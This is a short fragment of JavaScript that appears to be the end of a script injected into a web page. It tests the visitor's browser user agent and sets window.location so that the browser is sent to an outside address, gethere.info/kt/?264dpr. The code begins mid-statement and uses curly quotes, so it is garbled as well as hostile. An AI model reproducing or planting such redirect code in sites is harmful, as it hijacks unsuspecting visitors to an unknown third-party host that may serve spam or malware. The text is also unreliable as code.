window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}